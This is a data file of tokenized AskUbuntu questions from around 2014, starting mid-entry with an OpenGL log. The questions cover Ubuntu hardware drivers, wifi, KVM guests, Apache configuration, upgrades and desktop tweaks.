00:00:00.177565 opengl info : render spu : gl_renderer : gallium 0.4 on amd caicos 00:00:00.177597 opengl info : render spu : gl_version : 3.0 mesa 10.1.0 00:00:00.177661 opengl info : render spu : gl_extensions : gl_arb_multisample gl_ext_abgr gl_ext_bgra gl_ext_blend_color gl_ext_blend_minmax gl_ext_blend_subtract gl_ext_copy_texture gl_ext_polygon_offset gl_ext_subtexture gl_ext_texture_object gl_ext_vertex_array gl_ext_compiled_vertex_array gl_ext_texture gl_ext_texture3d gl_ibm_rasterpos_clip gl_arb_point_parameters gl_ext_draw_range_elements gl_ext_packed_pixels gl_ext_point_parameters gl_ext_rescale_normal gl_ext_separate_specular_color gl_ext_texture_edge_clamp gl_sgis_generate_mipmap gl_sgis_texture_border_clamp gl_sgis_texture_edge_clamp gl_sgis_texture_lod gl_arb_framebuffer_srgb gl_arb_multitexture gl_ext_framebuffer_srgb gl_ibm_multimode_draw_arrays gl_ibm_texture_mirrored_repeat gl_arb_texture_cube_map gl_arb_texture_env_add gl_arb_transpose_matrix gl_ext_blend_func_separate gl_ext_fog_coord gl_ext_multi_draw_arrays gl_ext_secondary_color gl_ext_texture_env_add gl_ext_texture_filter_anisotropic gl_ext_texture_lod_bias gl_ingr_blend_func_separate gl_nv_blend_square gl_nv_light_max_exponent gl_nv_texgen_reflection gl_nv_texture_env_combine4 gl_s3_s3tc gl_sun_multi_draw_arrays gl_arb_texture_border_clamp gl_arb_texture_compression gl_ext_framebuffer_object gl_ext_texture_compression_s3tc gl_ext_texture_env_combine gl_ext_texture_env_dot3 gl_mesa_window_pos gl_nv_packed_depth_stencil gl_nv_texture_rectangle gl_arb_depth_texture gl_arb_occlusion_query gl_arb_shadow gl_arb_texture_env_combine gl_arb_texture_env_crossbar gl_arb_texture_env_dot3 gl_arb_texture_mirrored_repeat gl_arb_window_pos gl_ext_stencil_two_side gl_ext_texture_cube_map gl_nv_depth_clamp gl_nv_fog_distance gl_apple_packed_pixels gl_apple_vertex_array_object gl_arb_draw_buffers gl_arb_fragment_program gl_arb_fragment_shader gl_arb_shader_objects gl_arb_vertex_program gl_arb_vertex_shader gl_ati_draw_buffers gl_ati_texture_env_combine3 gl_ati_texture_float gl_ext_shadow_funcs gl_ext_stencil_wrap gl_mesa_pack_invert gl_nv_primitive_restart gl_arb_depth_clamp gl_arb_fragment_program_shadow gl_arb_half_float_pixel gl_arb_occlusion_query2 gl_arb_point_sprite gl_arb_shading_language_100 gl_arb_sync gl_arb_texture_non_power_of_two gl_arb_vertex_buffer_object gl_ati_blend_equation_separate gl_ext_blend_equation_separate gl_oes_read_format gl_arb_color_buffer_float gl_arb_pixel_buffer_object gl_arb_texture_compression_rgtc gl_arb_texture_float gl_arb_texture_rectangle gl_ati_texture_compression_3dc gl_ext_packed_float gl_ext_pixel_buffer_object gl_ext_texture_compression_dxt1 gl_ext_texture_compression_rgtc gl_ext_texture_mirror_clamp gl_ext_texture_rectangle gl_ext_texture_srgb gl_ext_texture_shared_exponent gl_arb_framebuffer_object gl_ext_framebuffer_blit gl_ext_framebuffer_multisample gl_ext_packed_depth_stencil gl_arb_vertex_array_object gl_ati_separate_stencil gl_ati_texture_mirror_once gl_ext_draw_buffers2 gl_ext_draw_instanced gl_ext_gpu_program_parameters gl_ext_texture_array gl_ext_texture_compression_latc gl_ext_texture_integer gl_ext_texture_srgb_decode gl_ext_timer_query gl_oes_egl_image gl_arb_copy_buffer gl_arb_depth_buffer_float gl_arb_draw_instanced gl_arb_half_float_vertex gl_arb_instanced_arrays gl_arb_map_buffer_range gl_arb_texture_rg gl_arb_texture_swizzle gl_arb_vertex_array_bgra gl_ext_texture_swizzle gl_ext_vertex_array_bgra gl_nv_conditional_render gl_amd_conservative_depth gl_amd_draw_buffers_blend gl_amd_seamless_cubemap_per_texture gl_amd_shader_stencil_export gl_arb_es2_compatibility gl_arb_blend_func_extended gl_arb_debug_output gl_arb_draw_buffers_blend gl_arb_draw_elements_base_vertex gl_arb_explicit_attrib_location gl_arb_fragment_coord_conventions gl_arb_provoking_vertex gl_arb_sampler_objects gl_arb_seamless_cube_map gl_arb_shader_stencil_export gl_arb_shader_texture_lod gl_arb_texture_cube_map_array gl_arb_texture_multisample gl_arb_texture_rgb10_a2ui gl_arb_uniform_buffer_object gl_arb_vertex_type_2_10_10_10_rev gl_ext_provoking_vertex gl_ext_texture_snorm gl_mesa_texture_signed_rgba gl_nv_texture_barrier gl_arb_get_program_binary gl_arb_robustness gl_arb_shader_bit_encoding gl_arb_timer_query gl_arb_transform_feedback2 gl_arb_transform_feedback3 gl_nv_vdpau_interop gl_angle_texture_compression_dxt3 gl_angle_texture_compression_dxt5 gl_arb_base_instance gl_arb_conservative_depth gl_arb_internalformat_query gl_arb_map_buffer_alignment gl_arb_shading_language_420pack gl_arb_shading_language_packing gl_arb_texture_storage gl_arb_transform_feedback_instanced gl_ext_framebuffer_multisample_blit_scaled gl_ext_transform_feedback gl_amd_shader_trinary_minmax gl_arb_clear_buffer_object gl_arb_invalidate_subdata gl_arb_texture_storage_multisample gl_arb_vertex_attrib_binding gl_khr_debug gl_arb_texture_mirror_clamp_to_edge gl_arb_vertex_type_10f_11f_11f_rev 00:00:00.186480 opengl info : render spu : gl_max_vertex_uniform_components_arb=16384 00:00:00.187873 testing 3d succeeded ! note : time is incorrect . what i should do to make 3d acceleration work on fglrx ( yes , i know i can use open-source drivers , but i do n't want them ) ?
459495	can menus be moved below the title bar ?	i 've just upgraded to ubuntu 14.04 , and i 'm having one user interface problem in the new unity : i hate how the menu bar and title bar have been merged into one item . ( i hate even more the old scheme of moving title bars to the top of the screen , similar to what mac os has always done , so i 've always jumped through hoops to disable this behavior . ) is there some way to get the menu bar to appear below the title bar , like in every other linux gui ?
459497	wireless not working in kubuntu 13.10 hp dv6	i ca n't connect with wireless in my hp pavillon dv6 . i have followed several ( many ) blogs and tried most suggestions , but ca n't fix the problem . i 'm posting several command 's captures that could help . it is my first time in askubuntu , so sorry if i posted the code in wrong way thanks in advance code julio @ julio-hp : ~ $ lsb_release -a lsb version : core-2.0-amd64 : core-2.0-noarch : core-3.0-amd64 : core-3.0-noarch : core-3.1-amd64 : core-3.1-noarch : core-3.2-amd64 : core-3.2-noarch : core-4.0-amd64 : core-4.0-noarch : core-4.1-amd64 : core-4.1-noarch : cxx-3.0-amd64 : cxx-3.0-noarch : cxx-3.1-amd64 : cxx-3.1-noarch : cxx-3.2-amd64 : cxx-3.2-noarch : cxx-4.0-amd64 : cxx-4.0-noarch : cxx-4.1-amd64 : cxx-4.1-noarch : desktop-3.1-amd64 : desktop-3.1-noarch : desktop-3.2-amd64 : desktop-3.2-noarch : desktop-4.0-amd64 : desktop-4.0-noarch : desktop-4.1-amd64 : desktop-4.1-noarch : graphics-2.0-amd64 : graphics-2.0-noarch : graphics-3.0-amd64 : graphics-3.0-noarch : graphics-3.1-amd64 : graphics-3.1-noarch : graphics-3.2-amd64 : graphics-3.2-noarch : graphics-4.0-amd64 : graphics-4.0-noarch : graphics-4.1-amd64 : graphics-4.1-noarch : languages-3.2-amd64 : languages-3.2-noarch : languages-4.0-amd64 : languages-4.0-noarch : languages-4.1-amd64 : languages-4.1-noarch : multimedia-3.2-amd64 : multimedia-3.2-noarch : multimedia-4.0-amd64 : multimedia-4.0-noarch : multimedia-4.1-amd64 : multimedia-4.1-noarch : printing-3.2-amd64 : printing-3.2-noarch : printing-4.0-amd64 : printing-4.0-noarch : printing-4.1-amd64 : printing-4.1-noarch : qt4-3.1-amd64 : qt4-3.1-noarch : security-4.0-amd64 : security-4.0-noarch : security-4.1-amd64 : security-4.1-noarch distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy julio @ julio-hp : ~ $ lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 02:00.0 network controller : broadcom corporation bcm43225 802.11b/g/n ( rev 01 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) julio @ julio-hp : ~ $ lsusb bus 002 device 003 : id 064e : a127 suyin corp . bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 046d : c05a logitech , inc. m90/m100 optical mouse bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub julio @ julio-hp : ~ $ lsmod module size used by cfg80211 479757 0 parport_pc 32701 0 ppdev 17671 0 rfcomm 69070 0 bnep 19564 2 bluetooth 371874 10 bnep , rfcomm binfmt_misc 17468 1 joydev 17377 0 intel_powerclamp 14705 0 coretemp 13435 0 kvm 431315 0 uvcvideo 80885 0 videobuf2_vmalloc 13216 1 uvcvideo videobuf2_memops 13362 1 videobuf2_vmalloc videobuf2_core 40469 1 uvcvideo videodev 133390 2 uvcvideo , videobuf2_core hp_wmi 14062 0 sparse_keymap 13948 1 hp_wmi snd_hda_codec_hdmi 41276 1 microcode 23518 0 snd_hda_codec_idt 50341 1 snd_hda_intel 48171 3 snd_hda_codec 188738 3 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel psmouse 97626 0 serio_raw 13413 0 snd_hwdep 13602 1 snd_hda_codec snd_pcm 102033 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30095 1 snd_seq_midi snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29433 2 snd_pcm , snd_seq ir_lirc_codec 13021 0 lirc_dev 19980 1 ir_lirc_codec ir_mce_kbd_decoder 13214 0 ir_sanyo_decoder 12839 0 ir_sony_decoder 12713 0 snd 69141 17 snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_hda_codec_idt , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi ir_jvc_decoder 12751 0 ir_rc6_decoder 12874 0 lpc_ich 21080 0 ir_rc5_decoder 12710 0 ir_nec_decoder 12915 0 mei_me 18421 0 mei 77692 1 mei_me soundcore 12680 1 snd rc_rc6_mce 12502 0 hp_accel 26012 0 ene_ir 28939 0 rc_core 27718 11 ir_lirc_codec , ir_rc5_decoder , ir_nec_decoder , ir_sony_decoder , ene_ir , ir_mce_kbd_decoder , ir_jvc_decoder , ir_rc6_decoder , ir_sanyo_decoder , rc_rc6_mce lis3lv02d 20156 1 hp_accel input_polldev 13896 1 lis3lv02d mac_hid 13205 0 lp 17759 0 parport 42299 3 lp , ppdev , parport_pc hid_generic 12548 0 usbhid 53014 0 hid 101512 2 hid_generic , usbhid i915 655752 2 r8169 67341 0 ahci 25819 4 libahci 31898 1 ahci mii 13934 1 r8169 i2c_algo_bit 13413 1 i915 wmi 19070 1 hp_wmi drm_kms_helper 52651 1 i915 drm 296739 3 i915 , drm_kms_helper video 19318
459499	access local ubuntu sever from internet	i have an local network with two local server , other side i have a mikrotik router to share internet on that network . i can access my mikrotik route by its ip anywhere in internet . is there is any way by that i can access my all those server remotely from anywhere by internet connection ( i can access my local server in my local network ) ? i am using ubuntu server 14.04 .
459500	xbmc login and devilspie	i am a linux noob but does n't stop me : ) i have a dn2820 nuc as htpc with ubuntu 14 and xbmc 12.3 and it is working just great . i installed teamviewer 9 and i want it to autostart minimized . using the buildin feature of teamviewer does n't help because every login it 's showing again . i installed devilspie and it did it for me and the teamviewer is now minimized at login but when i autologin to xbmc ( instead of the desktop ) it 's still open up the teamviewer window in the middle of the screen . is there a way to auto load the devilspie even when i logging in directly to xbmc ? thank you verymuch in advance for trying to help me ! ! !
459503	how do i upgrade from 12.04 to 14.04	what steps do i take to upgrade from lts 12.04 to lts 14.04 with the least amount of trouble and loosing the fewest amount of data .
459504	evolution appears unable to store mail account details	i am trying to set up evolution with exchange so i can bypass windows for a bunch of office stuff . the problem i have is that when i set up my account , evolution just does n't seem to be able to store it . i provide the information , it seems to connect correctly , but then when i get to the end of the wizard there is no account configured . if i start evolution again i get the wizard again . this was a straight install of evolution and evolution-ews out of apt on a pretty much brand new 14.04 installation running xubuntu on the front . i could n't see any logs for evolution so i ran it with camel_debug=true evolution to get a bit of debugging and the first few lines look like this : ** ( evolution:14167 ) : warning ** : could n't connect to accessibility bus : failed to connect to socket /tmp/dbus-wlqfge8c5k : connection refused ( evolution:14167 ) : camel-warning ** : failed to initialize nss sql database in sql : /etc/pki/nssdb : nss error -8187 ** ( evolution-alarm-notify:14173 ) : warning ** : could n't connect to accessibility bus : failed to connect to socket /tmp/dbus-wlqfge8c5k : connection refused database succesfully opened this appears to be what was happening during the wizard , then once the wizard ends we get some regular behaviour where it creates databases and stuff . it turns out that the next time i logged in , evolution had the same account created four times , so apparently there was some problem there that it bypassed . it still ca n't retrieve messages from exchange so it 's as useful as a chocolate teapot , but this issue is kind of limited .
459507	how to change accels in gnome 3.10 ?	up to gnome 3.8 you could easily change your keyboard shortcuts inside an application with dconf , but that option is deprecated now . ( i 've read an entry on a mailing list about that . ) unfortunately , i could not find any other option to adapt the shortcuts to my needs for e.g . evolution . i 'd like to change the `` send mail '' command from ctrl+enter to alt+s . i have browsed through the .config/evolution directory and found the according accels file . i have changed the gtk-accel for send mail ( gtk_accel_path `` < actions > /mailto/send-message '' ) to < primary > < shift > 1 for testing purpose and uncommented the line . however , changes applied to that file do not change anything , since evolution seems to overwrite that file on startup . how could i alter the keyboard shortcuts ?
459509	resize ubuntu file system partition from windows ntfs drive ( dual boot )	i have dual boot os , ubuntu and windows . i want to resize the ubuntu file system partition that i take from windows ntfs partition here the harddrive : windows : c : \ = 50 gb d : \ = 230 gb ubuntu : / 20gb /swap = 1 gb and i want to resize the d : \ partition and add it to / on ubuntu . so the d : \ partition only have 200gb and the ubuntu partition have 50gb . i know how to resize the windows d : \ partition by using a software , but i do n't know how to add the unallocated drive ( unallocated drive from windows ntfs ) to ubuntu ( ext4 ) file system . i 'm affraid if i will broke the grub or the mbr .
459512	how to play .m4a in clementine ?	clementine says missing gstreamer plugin when i try to play a .m4a file . totem and rhythm box play it fine . $ wajig listinstalled gstreamer0.10 gstreamer0.10-alsa : amd64 gstreamer0.10-nice : amd64 gstreamer0.10-plugins-base : amd64 gstreamer0.10-plugins-good : amd64 gstreamer0.10-plugins-ugly : amd64 gstreamer0.10-pulseaudio : amd64 gstreamer0.10-x : amd64 libgstreamer0.10-0 : amd64 i 'm on trusty , clementine was great on precise , so keen to get it working again .
459513	gem install eventmachine fails , using rvm	ubuntu 13.10 64bit , ruby 2.1.1 rvm 1.25.24 gem 2.2.2 from log file : compiling pipe.cpp linking shared-object rubyeventmachine.so /usr/bin/ld : /usr/local/lib/libssl.a ( s23_srvr.o ) : relocation r_x86_64_32 against `.rodata ' can not be used when making a shared object ; recompile with -fpic /usr/local/lib/libssl.a : error adding symbols : bad value collect2 : error : ld returned 1 exit status make : *** [ rubyeventmachine.so ] error 1 make failed , exit code 2 what can i do to fix this ?
459517	nothing i do remains after restart	i installed ubuntu 12.04 from a cd on my 64gb ssd . i made 2 partitions ; 10gb for swap and the rest for the os . i formatted them as ext4 . ubuntu ran fine , but i am facing a strange problem . no matter what i do , it is ok to log out and back in , but it does not hold after a restart . if i change some settings , after a restart it is gone , i installed wine & some windows application in wine ; they worked fine , but after reboot they are gone . even if i delete something from my desktop , it appears again on the desktop after reboot . i added skype to my startup applications , but after reboot , it is no longer in the startup applications . i ca n't format the whole drive & reinstall ubuntu . i tried gparted , disk utility etc . i even tried with a xp cd , but no change remains . maybe my drive gets locked , so that any change vanishes after reboot . what can i do now ?
459518	kvm-guest only boots single user mode	we have a vserver host running on ubuntu 12.04 with kvm/qemu and so far guests been running fine with various os 's ( ubuntu 10.04 , 12.10 , debian 6,7 , centos 5,6 ) . after the installation of ubuntu 14.04 server ( which works just fine , via pxe ) , the guest freezes during booting with a black screen before the ubuntu loading logo appears . when putting in wrong network settings , the ubuntu loading logo appears but the system freezes after `` waiting 60 more seconds for network '' . replacing quiet splash $ vt_handoff boot parameters with single help the system boot up and after entering the root password , ssh can be started and the server can be accessed via ssh . just removing quiet splash $ vt_handoff , the last message shown is `` stopping system v runlevel compatibility [ ok ] '' i just can not find any clue in the logs , as somehow no logs are generated on a normal startup with freeze , only on startup with `` single '' . i also tried to add boot parameters debug verbose plymouth : debug to no avail . this is the xml config for the ubuntu 14.04 guest : < domain type='kvm ' id='254 ' > < name > name < /name > < uuid > cb6cb7e9-4399-603e-56ce-887f77985bc2 < /uuid > < memory > 1048576 < /memory > < currentmemory > 1048576 < /currentmemory > < vcpu > 1 < /vcpu > < sysinfo type='smbios ' > < system > < entry name='manufacturer ' > name < /entry > < /system > < /sysinfo > < os > < type arch='x86_64 ' machine='pc-0.14 ' > hvm < /type > < boot dev='network'/ > < boot dev='hd'/ > < bios useserial='yes'/ > < smbios mode='sysinfo'/ > < /os > < features > < acpi/ > < apic/ > < pae/ > < /features > < clock offset='utc'/ > < on_poweroff > destroy < /on_poweroff > < on_reboot > restart < /on_reboot > < on_crash > restart < /on_crash > < devices > < emulator > /usr/bin/kvm < /emulator > < disk type='block ' device='disk ' > < driver name='qemu ' type='raw'/ > < source dev='/volumes/name'/ > < target dev='sda ' bus='virtio'/ > < alias name='virtio-disk0'/ > < address type='pci ' domain='0x0000 ' bus='0x00 ' slot='0x05 ' function='0x0'/ > < /disk > < controller type='virtio-serial ' index='0 ' > < alias name='virtio-serial0'/ > < address type='pci ' domain='0x0000 ' bus='0x00 ' slot='0x04 ' function='0x0'/ > < /controller > < interface type='bridge ' > < mac address='ab : cd : ef : ab : cd : ef'/ > < source bridge='br0'/ > < target dev='vnet14'/ > < model type='virtio'/ > < alias name='net0'/ > < address type='pci ' domain='0x0000 ' bus='0x00 ' slot='0x03 ' function='0x0'/ > < /interface > < serial type='pty ' > < source path='/dev/pts/31'/ > < target port='0'/ > < alias name='serial0'/ > < /serial > < console type='pty ' tty='/dev/pts/32 ' > < source path='/dev/pts/32'/ > < target type='virtio ' port='0'/ > < alias name='console0'/ > < /console > < input type='mouse ' bus='usb ' > < alias name='input0'/ > < /input > < input type='mouse ' bus='ps2'/ > < graphics type='vnc ' port='5914 ' autoport='yes ' listen='0.0.0.0 ' keymap='de ' > < listen type='address ' address='0.0.0.0'/ > < /graphics > < video > < model type='cirrus ' vram='65536 ' heads='1'/ > < alias name='video0'/ > < address type='pci ' domain='0x0000 ' bus='0x00 ' slot='0x02 ' function='0x0'/ > < /video > < memballoon model='virtio ' > < alias name='balloon0'/ > < address type='pci ' domain='0x0000 ' bus='0x00 ' slot='0x06 ' function='0x0'/ > < /memballoon > < /devices > < /domain > since it 's a server install , no gui is installed so no display manager is installed also . so it seems that this is a problem of a combination of the used kernel and the shipped kvm/qemu version . i set up a new server to play around and this is what i found out : | host | host kernel | guest | guest kernel | result | | 12.04.4 | 3.2 | 12.04.4 | 3.2 | ok | | 12.04.4 | 3.11 | 12.04.4 | 3.11 | guest freeze , unreachable | | 12.04.4 | 3.13 | 12.04.4 | 3.11 | console/vga freeze / guest reachable | | 12.04.4 | 3.13 | 12.04.4 | 3.13 | console/vga freeze / guest reachable | | 12.04.4 | 3.2 | 14.04 | 3.13 | guest freeze , unreachable | | 14.04 | 3.13 | 12.04.4 | 3.11 | ok | | 14.04 | 3.13 | 14.04 | 3.13 | ok | the kvm/libvirt version used was the most current from the specific repository .
459519	why downloading speed varies with download managers ?	i am running ubuntu 14.04 , i used varies download managers and found variation in downloading speed . uget ( recommended ) flareget xdm ( xtreme download manager ) steadyflow i find max . downloading speed on xdman which is java application . my question is : which factors affecting to downloading speed to different download manager ? how they working differently ? note : i do n't wo n't opinion from users . but factors affecting and raise knowledge about how working differently . because i want to use suitable download manager from ubuntu repositories . note : my question is not purposed to show xdman powerful . this question analyzed as off-topic so-that put on hold , then i asked on unix & linux
459522	run spark in ubuntu 14.04	previously i was using spark instant messenger in ubuntu 12.04 , whenever i need to start spark , just i will run the shell script by double click ( in file properties changed as `` allow executing file as program '' ) . but i upgraded to 14.04 , even if i change the properties as `` allow executing file as program '' , not able to run the script . every time need to open the terminal and run the script . is there any other way that i can run spark by double click ? ? forgive me for my poor grammar .
459523	unable to change the default directory in apache/2.4.7 on ubuntu 14.04	i 'd like to change the default directory from /var/www/ to a folder in dropbox i.e /home/username/dropbox/www but when i edit the 000-default.conf file , the browser gives me 403 errors even after fixing permissions with chmod -r 755 .
459525	ubuntu 14.04 lenovo e430	recently install ubuntu 14.04 to my lenovo e430 , and everything seems to work fine , except the wlan device ; do you guys know how to install or make it work ? , it only recongnize the eth0 . the device brand is : rtl8188ce 802.11b/g/n wifi adapter funny thing is that from w7 works . cheers
459526	laptop not booting	i 've got a vaio laptop that used to work with 13.10 . i did an upgrade to 14.04 and since then it does not want to boot any more , that is it does n't seem to reach grub : i 'm stuck on a `` bios '' screen telling me `` windows ( sic ) failed to load : recovery solution , contact vaio , ... '' running boot-repair does not help ( http : //paste.ubuntu.com/7309686/ ) i wiped out my ssd and did a fresh install of 14.04 ( default options ) : nope . also tried fresh install 13.10 : nope ( even though boot-repair tells me `` no error '' this time ) i tried fedora : success ! ! ( but i 'd prefer ubuntu ) i tried 14.10 again but using a legacy boot this time instead of uefi : success but it takes 14s to boot compared to the previous 3s ! that 's not really satisfying ! my questions : by `` wipe out '' i mean delete mbr and gpt informations by writing 0s on the disk ( dd if=/dev/zero ... ) . could it be an issue ? any ways to know what 's wrong during the boot process before grub is started ? can it be related to a bios/efi bug in the firmware ? any idea what could be the problem ? **update : ** i checked where grub was installed but i could n't find it ( see this ) ? ! i dumped the 512k at start of the disk and ... there are all 0s ! ? it should contain grub no ? thanks guys
459527	installation hangs up on 14.04	i 'm trying to install 14.04 on a hp/compaq laptop with 1.5g ram and a 25g hard drive . it had windows xp on it and it was full of viruses so i figured i 'd experiment with ubuntu . i downloaded 14.04 , 32 bit version , burned a disc image dvd and popped it into the laptop . i opted for doing a full erase of xp and installing 14.04 , i checked the boxes for 'install updates ' and 'install ' some mp3 app . anyway , three times now the install hangs up at the same exact spot ... ..'configuring bcmwl-kernel-source ( i386 ) ' . i 've let it hang there for days and it never gets any further . any suggestions ?
459528	ubuntu 14.04 , nvidia driver 304.117 for 7600gt	i have a clean new installation on an ssd drive of ubuntu 14.04 with nvidia driver 304.117 running . after ( very quick ) boot i can hear that the login screen has started but no picture on my f-hd monitor . by switching from lightdm to terminal and back with ctrl+alt f1 and ctrl+alt f7 everything is fine and works like a charm . but how can i make ubuntu start as it should do directly into graphical login and ui ? could it be that boot process is too ? ! fast for my good old computer ? any idea ? regards makku
459529	adt bundle 's menus does not open on 13.10	i download android bundle 64bit to my 64bit ubuntu 13.10 . installation was correct . bundle opens properly but when i try to use top menus of eclipse they do n't open . how i can solve this problem ?
459531	i just got the 14.04 and ca n't get my wifi	i just signed up for the 14.04 and i have wifi in my home and office but i ca n't log in to either on the laptops or desktops . please help
459537	vnc from samsung chromebook to ipad ?	i have a samsung chromebook series 3 with an arm processor , i 've installed ubuntu 12.04 unity and am trying to use vnc for the 1st time to display to my ipad . i 'm a noob with ubuntu . on pc i 've used teamviewer but this seems to be incompatible with arm processors , i 've installed 'x11vnc server ' but am unable to connect via this . is there an easier way to get the display to my ipad or a good online guide to vnc for noobs ?
459540	second monitor available without beeing connected	yesterday i installed ubuntu on my laptop , and everything worked better than thought , but : my laptop recognises two screens . i mean , you can connect a second screen to it by hdmi or vga , but both connectors are empty the whole time . what could it bet ? the laptop uses a nvidia gt 520m and an intel hd300 graphics card . how to fix that ?
459542	missing canonical partners and independent repositories in ubuntu 14.04	i have encountered a strange problem today when i found that canonical partners and independent repositories have gone missing from `` other software '' tab of `` software and updates '' . i also noticed that `` main '' , `` universe '' , `` multiverse '' and `` restricted '' are all disabled as well as `` trusy-security '' , `` trusty-updates '' , `` trusy-proposed '' and `` trusty-backports '' . the question is : how can i add canonical and independent repositories back so that i can re-enable them ? and what could have caused this ? thank you in advance .
459544	dual monitor lubuntu how to change wallpaper in extended screen ?	hi i have dual monitor in lubuntu . the main screen is 1280x800 and the extended screen is 1024x768 . i installed variety . it changes wallpaper every 5 minutes . however it changes wallpaper only in main screen . in the extended screen the wallpaper stays always the same . it is the default lubuntu wallpaper . i tried to change wallpaper in extended screen using nitrogen but nothing happens . how to change wallpaper in extended screen ?
459550	wireless card not detected ... sometimes	i am usiong ubuntu 14.04 amd64 . today , i started having problems with my wireless card ( manufactured by tp-link , i do n't remember the exact model ) . the system did n't detect it ( it was n't displayed after using lshw -c network ) . after two reboots , it appeared , but then , after shutting down the computer and starting it again sometime later , the problem repeated itself . this time , one reboot was sufficient to make it work . when it is detected , its ' description in lshw -c network output is the following : *-network description : wireless interface product : ar2417 wireless network adapter [ ar5007g 802.11bg ] vendor : qualcomm atheros physical id : 2 bus info : pci @ 0000:05:02.0 logical name : wlan0 version : 01 serial : 00:27:19 : c3:35 : b2 width : 32 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath5k driverversion=3.13.0-24-generic firmware=n/a ip=192.168.1.101 latency=168 link=yes maxlatency=28 mingnt=10 multicast=yes wireless=ieee 802.11bg resources : irq:23 memory : ff9f0000-ff9fffff what can i do to make it work every time ?
459551	gnome-flashback panels not starting in ubuntu 14.04	after upgrading to 14.04 lts , my gnome-flashback session starts , but without the top and bottom panels . logging with compiz , i can use ctrl+shift+t to start a terminal and run `` gnome-panel '' , which starts both panels . i 'm using this workaround , but it is very annoying to login without the panels . .xession-errors shows nothing related to gnome-flahback , just stuff like this : init : indicator-bluetooth main process ended , respawning init : indicator-bluetooth respawning too fast , stopped any ideas ?
459556	nat vm network to adapter another vm network adapter	i have ubuntu as a host os , and i have installed virtual box 4.3.10 , 2 vms have been prepared vm1 ( windows 7 ) vm2 ( arch linux ) for network security windows 7 only can access the internet while iâm at work so even ubuntu the host ca n't access the internet . so i bridged the windows network adapter to access the work internet so i would like to let arch also to access internet through the windows ..
459560	14.04 with nvidia 800m series graphics card	i have recently bought a sager np7338 laptop which has the 860m nvidia geforce card on it with optimus technology . ubuntu 14.04 does not recognize that i have a nvidia graphics card at all . is this the root of my problem and the reason why i can not get it to work or is this normal with the optimus technology ? i have figured out that i can use both graphics cards ( because there is also a dedicate intel graphics card ) with nvidia-prime from this question : how can i switch back to nvidia card from intel with nvidia-prime ?
459562	how to install primus or virtualgl on ubuntu 12.10 to run bumblebee ?	i failed to install bumblebee with apt-get . after i install bumblebee by source code success , i failed to use optirun to run some program . it shows : brian @ brian-ge620-fx620dx : ~/download/primus $ optirun roslaunch pr2_gazebo pr2_empty_world.launch [ 3063.733885 ] [ error ] no bridge found . try installing primus or virtualgl . brian @ brian-ge620-fx620dx : ~/download/primus $ i tried to install virtualgl but unknown how to proceed : wget -o virtualgl32_2.3.3_amd64.deb http : //downloads.sourceforge.net/project/virtualgl/2.3.3/virtualgl32_2.3.3_amd64.deb ? r=http % 3a % 2f % 2fsourceforge.net % 2fprojects % 2fvirtualgl % 2ffiles % 2f & ts=1399037774 & use_mirror=cznic sudo dpkg -i virtualgl32_2.3.3_amd64.deb i tried to install primus but unknown how to proceed : sudo aptitude install primus-lib git clone https : //github.com/amonakov/primus cd primus/ make how to install them ?
459567	running iso through virtualbox	i have a mac iso that works flawlessly on my windows virtualbox but for some reason i can not get it to load up on my linux virtualbox . i have created it with 30g of storage and a fair amount of ram . i then added the iso to the machiene and switched to it on my devices . once i have done this i get no feedback , just a blank screen , on bootup . have i missed a step or is this another error . thanks in advance p.s . i have run a virtual machiene through qemu witch was dreadfully slow but still worked .
